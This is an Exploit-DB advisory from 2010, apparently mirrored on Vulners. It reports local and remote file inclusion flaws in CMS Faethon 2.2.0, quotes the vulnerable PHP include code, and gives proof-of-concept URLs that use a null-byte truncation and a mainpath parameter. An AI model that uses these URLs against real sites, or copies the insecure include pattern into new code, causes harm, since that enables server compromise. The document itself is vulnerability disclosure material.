Lucene search
K

CmsFaethon 2.2.0 (ultimate.7z) - Multiple Vulnerabilities

🗓️ 26 Mar 2010 00:00:00Reported by eidelweissType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 20 Views

CMS Faethon 2.2.0 (ultimate.7z) multiple vulnerabilities in admin and mobile pages, including LFI and RF

Code
#####################################################################################
	cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
#####################################################################################

[+]Vendor: 	CMS Faethon
[+]Version: 	2.2.0-ultimate.7z
[+]License: 	GNU GENERAL PUBLIC LICENSE
[+]Download:	http://sourceforge.net/projects/cmsfaethon/files/
[+]Risk: 	High
[+]Remote:	Yes
[+]Local:	Yes
[+]Vulnerable:	Since v1.12
		CMS Faethon 1.3 (CMS Faethon 1.3-Ultimed to  cmsfaethon-1.3.5-ultimate.7z)
		CMS Faethon 2.0 (cmsfaethon-2.0-ultimate.7 to CMS Faethon 2.0.5 Blog Edition )
		CMS Faethon 2.2.0 Ultimate
		
###########################################################
[+]Author:	eidelweiss
[+]Contact:	eidelweiss[at]cyberservices[dot]com
[+]Date:	March 26 2010 (published march 27)
[+]Thank`s:	sp3x (securityreason) - JosS (hack0wn) - r0073r & 0x1D (inj3ct0r)
[+]Special:	[D]eal [C]yber - syabilla_putri (i miss u to) 
###########################################################

####################


-=[Description]=-


CMS Faethon is content management system for different web pages.

	CMS Faethon 2.2
	  
	This program is free software; you can redistribute it and/or
	modify it under the terms of the GNU General Public License
	as published by the Free Software Foundation; either version 2
	of the License, or (at your option) any later version.

####################

-=[ VULN & =[P0C]= C0de ]=-

####################
	$File: admin/index.php
####################

***/

session_start();
$mainpath = "./";
include($mainpath .'../lib/functions_SQL.php'); 
include($mainpath .'../lib/functions_DATE.php');
include($mainpath .'../lib/class_multilang.php');
include($mainpath .'../lib/class_menu.php');
if($_GET['cmd'] != 'acp' || ($_GET['cmd'] == 'acp' && isset($_SESSION['auth_key']))) {
	include($mainpath .'header.php');
} else {
	include($mainpath .'config.php'); // possible Lfi here
	include($mainpath .'auth.php');
}

####################
	$File: mobile/index.php
####################


require('../config.php');
include('../lang/'.$cfg['lang'].'.inc');
$mainpath = "./";
$title = "Titulní strana";
include($mainpath . 'header.php');

####################
	$File: admin/articles/edit.php
####################

if(!isset($_GET['cmd'])) { 
	$mainpath = "../"; 
	include($mainpath . '../lib/functions_SQL.php');
	include($mainpath . 'header.php') ;


-=[P0C]=-

	http://127.0.0.1/[cms_faethon_path]/admin/index.php?mainpath=[LFI]%00
	
	http://127.0.0.1/[cms_faethon_path]/admin/articles/edit.php?mainpath=[RFI]

	http://127.0.0.1/[cms_faethon_path]/mobile/index.php?mainpath=[RFI]
	
	etc,etc,etc !!!

	so many vulnerability in this project 
	(I also saw possibility Directory Traversal vulnerability , use your skill and play your imaginasion)


###########################################################=[E0F]=###########################################################

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Mar 2010 00:00Current
7.4High risk
Vulners AI Score7.4
20